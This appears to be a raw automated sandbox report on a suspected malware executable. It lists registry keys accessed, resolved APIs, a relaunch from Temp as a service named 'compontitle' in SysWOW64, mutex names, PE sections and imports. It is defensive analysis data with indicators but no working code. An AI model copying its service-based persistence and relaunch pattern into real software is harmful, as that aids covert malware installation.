HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\DisableProcessIsolation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\NoOplock
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MaxUndoItems
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Advanced\MaxUndoItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceCopyACLWithFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoEncryptOnMove
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Interval
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Shuffle
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\AnimationDuration
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Flags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\compontitle\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\compontitle\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\compontitle\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\compontitle\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\nsiproxy\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\nsi\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NlaSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\netprofm\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MMCSS\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MMCSS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MMCSS\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MMCSS\RequiredPrivileges
HKEY_USERS\.DEFAULT\Control Panel\Desktop\SmoothScroll
HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName
HKEY_USERS\.DEFAULT\Control Panel\International\sCountry
HKEY_USERS\.DEFAULT\Control Panel\International\sList
HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal
HKEY_USERS\.DEFAULT\Control Panel\International\sThousand
HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits
HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign
HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign
HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat
HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime
HKEY_USERS\.DEFAULT\Control Panel\International\s1159
HKEY_USERS\.DEFAULT\Control Panel\International\s2359
HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate
HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth
HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate
HKEY_USERS\.DEFAULT\Control Panel\International\iCountry
HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure
HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize
HKEY_USERS\.DEFAULT\Control Panel\International\iDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iLZero
HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber
HKEY_USERS\.DEFAULT\Control Panel\International\NumShape
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr
HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
\xe6\xa9\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\EnableFileTracing
\xe6\xa9\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\FileTracingMask
\xe6\xa9\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\EnableConsoleTracing
\xe6\xa9\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\ConsoleTracingMask
\xe6\xa9\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\MaxFileSize
\xe7\x89\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASAPI32\FileDirectory
\xe7\x89\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\EnableFileTracing
\xe7\x89\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\FileTracingMask
\xe7\x89\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\EnableConsoleTracing
\xe7\x89\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\ConsoleTracingMask
\xe7\x89\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\MaxFileSize
\xe7\x89\xa0\xc3\xabEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\compontitle_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
kernel32.dll.FlsAlloc
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.FlsFree
kernelbase.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.ProcessIdToSessionId
imm32.dll.ImmCreateContext
imm32.dll.ImmDestroyContext
imm32.dll.ImmNotifyIME
imm32.dll.ImmAssociateContext
imm32.dll.ImmReleaseContext
imm32.dll.ImmGetContext
imm32.dll.ImmGetCompositionStringA
imm32.dll.ImmSetCompositionStringA
imm32.dll.ImmGetCompositionStringW
imm32.dll.ImmSetCompositionStringW
imm32.dll.ImmSetCandidateWindow
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptDeriveKey
cryptsp.dll.CryptEncrypt
kernel32.dll.IsProcessorFeaturePresent
oleaut32.dll.#200
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
comctl32.dll.#385
comctl32.dll.#320
comctl32.dll.#324
comctl32.dll.#323
ole32.dll.CreateBindCtx
ole32.dll.CoTaskMemAlloc
ole32.dll.CoGetApartmentType
ole32.dll.CoRegisterInitializeSpy
ole32.dll.CoTaskMemFree
comctl32.dll.#236
oleaut32.dll.#6
ole32.dll.CoGetMalloc
comctl32.dll.#328
comctl32.dll.#334
oleaut32.dll.#2
ole32.dll.CoCreateInstance
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
advapi32.dll.InitializeSecurityDescriptor
advapi32.dll.SetEntriesInAclW
ntmarta.dll.GetMartaExtensionInterface
advapi32.dll.SetSecurityDescriptorDacl
setupapi.dll.CM_Get_Device_Interface_List_ExW
advapi32.dll.IsTextUnicode
comctl32.dll.#332
comctl32.dll.#338
comctl32.dll.#339
comctl32.dll.#386
shell32.dll.#102
advapi32.dll.OpenThreadToken
propsys.dll.PSLookupPropertyHandlerCLSID
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryValueExW
advapi32.dll.RegCloseKey
propsys.dll.PSCreatePropertyStoreFromObject
propsys.dll.#417
propsys.dll.PropVariantToStringAlloc
ole32.dll.PropVariantClear
propsys.dll.PSCreateMemoryPropertyStore
propsys.dll.PropVariantToBuffer
propsys.dll.PropVariantToUInt64
propsys.dll.PropVariantToBoolean
propsys.dll.InitPropVariantFromBuffer
advapi32.dll.GetNamedSecurityInfoW
advapi32.dll.TreeSetNamedSecurityInfoW
ole32.dll.CoUninitialize
comctl32.dll.#329
comctl32.dll.#388
comctl32.dll.#321
ole32.dll.CoRevokeInitializeSpy
oleaut32.dll.#500
comctl32.dll.#387
comctl32.dll.#327
advapi32.dll.UnregisterTraceGuids
cryptsp.dll.CryptReleaseContext
ntdll.dll.EtwUnregisterTraceGuids
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptGenKey
cryptsp.dll.CryptDuplicateHash
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
iphlpapi.dll.GetAdaptersAddresses
dhcpcsvc.dll.DhcpRequestParams
--f4134209
C:\Users\user\AppData\Local\Temp\nonmanual.exe --f4134209
"C:\Windows\SysWOW64\compontitle.exe"
--ce2bae20
C:\Windows\SysWOW64\compontitle.exe --ce2bae20
gcc-shmem-tdm2-use_fc_key
gcc-shmem-tdm2-sjlj_once
gcc-shmem-tdm2-once_global_shmem
gcc-shmem-tdm2-once_obj_shmem
gcc-shmem-tdm2-mutex_global_shmem
gcc-shmem-tdm2-_pthread_tls_once_shmem
gcc-shmem-tdm2-_pthread_tls_shmem
gcc-shmem-tdm2-mtx_pthr_locked_shmem
gcc-shmem-tdm2-mutex_global_static_shmem
gcc-shmem-tdm2-mxattr_recursive_shmem
gcc-shmem-tdm2-pthr_root_shmem
gcc-shmem-tdm2-idListCnt_shmem
gcc-shmem-tdm2-idListMax_shmem
gcc-shmem-tdm2-idList_shmem
gcc-shmem-tdm2-idListNextId_shmem
gcc-shmem-tdm2-fc_key
gcc-shmem-tdm2-_pthread_key_lock_shmem
gcc-shmem-tdm2-_pthread_cancelling_shmem
gcc-shmem-tdm2-cond_locked_shmem_rwlock
gcc-shmem-tdm2-rwl_global_shmem
gcc-shmem-tdm2-_pthread_key_sch_shmem
gcc-shmem-tdm2-_pthread_key_max_shmem
gcc-shmem-tdm2-_pthread_key_dest_shmem
Global\IA4889F95
Global\MA4889F95
IESQMMUTEX_0_208
compontitle
compontitle

PE Information

Image Base 0x00400000
Entry Point 0x004014e0
Reported Checksum 0x000622e7
Actual Checksum 0x00064f16
Minimum OS Version 4.0
Compile Time 2019-11-14 21:05:36
Import Hash 4151de9accf118d99670f695f3c0da21

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x000182b8 0x00018400 IMAGE_SCN_CNT_CODE|IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_16BYTES 5.98
.data 0x0001a000 0x00014020 0x00014200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE|IMAGE_SCN_ALIGN_32BYTES 6.87
.rdata 0x0002f000 0x0000325c 0x00003400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_32BYTES 5.44
.bss 0x00033000 0x00000498 0x00000000 IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE|IMAGE_SCN_ALIGN_32BYTES 0.00
.idata 0x00034000 0x00000e34 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE|IMAGE_SCN_ALIGN_4BYTES 4.91
.CRT 0x00035000 0x00000038 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE|IMAGE_SCN_ALIGN_4BYTES 0.31
.tls 0x00036000 0x00000020 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE|IMAGE_SCN_ALIGN_4BYTES 0.22
.rsrc 0x00037000 0x000004f0 0x00000600 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE|IMAGE_SCN_ALIGN_4BYTES 2.88
/4 0x00038000 0x00000358 0x00000400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_8BYTES 1.96
/19 0x00039000 0x0000d972 0x0000da00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES 6.10
/31 0x00047000 0x00001ffc 0x00002000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES 4.67
/45 0x00049000 0x000020d5 0x00002200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES 5.74
/57 0x0004c000 0x00000bc4 0x00000c00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_4BYTES 4.70
/70 0x0004d000 0x0000031c 0x00000400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES 4.28
/81 0x0004e000 0x000019f2 0x00001a00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES 3.51
/92 0x00050000 0x00000608 0x00000800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_ALIGN_1BYTES 2.55

Overlay

Offset 0x00046a00
Size 0x000140c5

Imports

Library ADVAPI32.dll:
0x434284 SetFileSecurityW
Library COMDLG32.DLL:
0x43428c ChooseColorA
Library GDI32.dll:
0x434294 CreateSolidBrush
Library KERNEL32.dll:
0x43429c AddAtomA
0x4342a0 CloseHandle
0x4342a4 CreateEventA
0x4342a8 CreateMutexA
0x4342ac CreateSemaphoreA
0x4342b4 DuplicateHandle
0x4342bc FindAtomA
0x4342c0 GetAtomNameA
0x4342c4 GetCurrentProcess
0x4342c8 GetCurrentProcessId
0x4342cc GetCurrentThread
0x4342d0 GetCurrentThreadId
0x4342d8 GetLastError
0x4342e0 GetStartupInfoA
0x4342e8 GetThreadContext
0x4342ec GetThreadPriority
0x4342f0 GetTickCount
0x434300 InterlockedExchange
0x434314 ReleaseMutex
0x434318 ReleaseSemaphore
0x43431c ResetEvent
0x434320 ResumeThread
0x434324 SetEvent
0x434328 SetLastError
0x434330 SetThreadContext
0x434334 SetThreadPriority
0x43433c Sleep
0x434340 SuspendThread
0x434344 TerminateProcess
0x434348 TlsAlloc
0x43434c TlsGetValue
0x434350 TlsSetValue
0x43435c VirtualProtect
0x434360 VirtualQuery
0x434368 WaitForSingleObject
0x43436c WinExec
Library msvcrt.dll:
0x434374 __dllonexit
0x434378 __getmainargs
0x43437c __initenv
0x434380 __lconv_init
0x434384 __set_app_type
0x434388 __setusermatherr
0x43438c _acmdln
0x434390 _amsg_exit
0x434394 _beginthreadex
0x434398 _cexit
0x43439c _endthreadex
0x4343a0 _fmode
0x4343a4 _ftime
0x4343a8 _initterm
0x4343ac _iob
0x4343b0 _lock
0x4343b4 _onexit
0x4343b8 _setjmp3
0x4343bc _unlock
0x4343c0 _write
0x4343c4 abort
0x4343c8 calloc
0x4343cc exit
0x4343d0 fclose
0x4343d4 fopen
0x4343d8 fprintf
0x4343dc fputc
0x4343e0 fputs
0x4343e4 free
0x4343e8 fwrite
0x4343ec longjmp
0x4343f0 malloc
0x4343f4 memcmp
0x4343f8 memcpy
0x4343fc memmove
0x434400 memset
0x434404 printf
0x434408 realloc
0x43440c signal
0x434410 sprintf
0x434414 strcmp
0x434418 strlen
0x43441c strncmp
0x434420 vfprintf
Library USER32.dll:
0x434428 CreateWindowExA
0x43442c DefWindowProcA
0x434430 DialogBoxParamA
0x434434 DispatchMessageA
0x434438 EnableWindow
0x43443c EndDialog
0x434440 GetDlgItem
0x434444 GetDlgItemInt
0x434448 GetDlgItemTextA
0x43444c GetMessageA
0x434450 IsDlgButtonChecked
0x434454 LoadCursorA
0x434458 LoadIconA
0x43445c PostQuitMessage
0x434460 RedrawWindow
0x434464 RegisterClassA
0x434468 SendDlgItemMessageA
0x43446c SendMessageA
0x434470 ShowWindow
0x434474 TranslateMessage

.text
P`.data
.rdata
`@.bss
.idata
.rsrc
@B/19
0B/70
D$$plA
D$@`wA
K1Z~.
WS_BORDER
WS_CAPTION
WS_CHILD
WS_CHILDWINDOW
WS_CLIPCHILDREN
WS_CLIPSIBLINGS
WS_DISABLED
WS_DLGFRAME
WS_GROUP
WS_HSCROLL
WS_ICONIC
WS_MAXIMIZE
WS_MAXIMIZEBOX
WS_MINIMIZE
WS_MINIMIZEBOX
WS_OVERLAPPED
WS_OVERLAPPEDWINDOW
WS_POPUP
WS_POPUPWINDOW
WS_SIZEBOX
WS_SYSMENU
WS_TABSTOP
WS_THICKFRAME
WS_TILED
WS_TILEDWINDOW
WS_VISIBLE
WS_VSCROLL
IDI_APPLICATION
IDI_ASTERISK
IDI_ERROR
IDI_EXCLAMATION
IDI_HAND
IDI_INFORMATION
IDI_QUESTION
IDI_WARNING
